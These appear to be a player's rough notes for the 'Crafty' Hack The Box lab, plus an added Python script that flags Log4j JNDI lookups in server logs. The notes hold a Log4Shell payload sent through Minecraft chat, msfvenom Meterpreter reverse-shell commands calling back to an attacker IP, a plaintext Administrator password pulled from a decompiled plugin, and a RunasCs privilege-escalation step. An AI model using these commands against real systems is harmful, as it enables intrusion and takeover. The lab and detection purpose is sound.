open ports: 80, 25565
Minecraft version 1.16.5
echo "10.129.165.0 crafty.htb play.crafty.htb" >> /etc/hosts
run gobuster to find directories
/coming.soon /home
run dirsearch
nothing special found
try it
download
modify this function to be a windows payload:
python3 poc.py --userip 10.10.14.65 --webport 8000 --lport 6666
${jndi:ldap://10.10.14.65:1389/a}
here is the payload I created
start minecraft
got the shell
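
Added example (not part of the original notes): a defender-side check that scans server log or chat text for the ${jndi:...} lookup used above and reports the remote endpoint it names. The log lines are constructed; only the lookup string is taken from these notes. It assumes the text is captured before Log4j formats it (a proxy, a chat filter, or a patched server's log), since a vulnerable server can substitute the lookup before the line is written.

```python
import re
from urllib.parse import urlsplit

# Log4j lookup of the form ${jndi:<scheme>://<host>[:port]/<path>}
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+://[^}\s]+)\}", re.IGNORECASE)
# Chat line as written by the server: [time] [thread/LEVEL]: <player> message
CHAT_RE = re.compile(r"^\[[\d:]+\] \[[^\]]+\]: <(?P<player>[^>]+)> ")

# Constructed sample lines; only the lookup string itself comes from the notes.
SAMPLE_LOG = """\
[12:01:07] [Server thread/INFO]: Steve joined the game
[12:01:15] [Server thread/INFO]: <Steve> hello everyone
[12:02:41] [Server thread/INFO]: <Alex> ${jndi:ldap://10.10.14.65:1389/a}
[12:03:02] [Server thread/INFO]: <Steve> price is ${5} each
"""

def find_jndi_lookups(text):
    """Return one finding per JNDI lookup, with the remote endpoint it names."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        chat = CHAT_RE.match(line)
        for m in JNDI_RE.finditer(line):
            target = m.group(1)
            try:
                url = urlsplit(target)
                host, port = url.hostname, url.port
            except ValueError:  # malformed host or port: keep the finding anyway
                host = port = None
            findings.append({
                "line": lineno,
                "player": chat["player"] if chat else None,
                "scheme": target.split("://", 1)[0].lower(),
                "host": host,
                "port": port,
            })
    return findings

if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

An outbound connection from the server host to the reported host and port (LDAP on 1389 here) is the follow-up indicator to look for in firewall or flow logs.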
c:\users\svc_minecraft\server>type usercache.json
type usercache.json
[{"name":"Serotonine_","uuid":"993d0aa7-1150-3684-9019-386c4f0262ae","expiresOn":"2024-03-11 00:52:01 -0700"}]

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

c:\>net users
net users

User accounts for \\CRAFTY

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
jacob                    svc_minecraft            WDAGUtilityAccount

 Directory of c:\Users\svc_minecraft\server\plugins

10/27/2023  01:48 PM    <DIR>          .
10/27/2023  01:48 PM    <DIR>          ..
10/27/2023  01:48 PM             9,996 playercounter-1.0-SNAPSHOT.jar
               1 File(s)          9,996 bytes
               2 Dir(s)   2,847,625,216 bytes free
download it
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.65 LPORT=4444 -f exe -o reverse.exe
-> msfconsole
cd %temp%
download
open jd-gui
sudo dpkg -i jd-gui-1.6.6.deb
found a credential-like string inside the .jar file
back on the lab machine, we try this credential
s67u84zKq8IXw
upload RunasCs.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.65 LPORT=7777 -f exe -o reverse2.exe
upload reverse2.exe
-> msfconsole
RunasCs.exe "Administrator" "s67u84zKq8IXw" "reverse2.exe"
got root!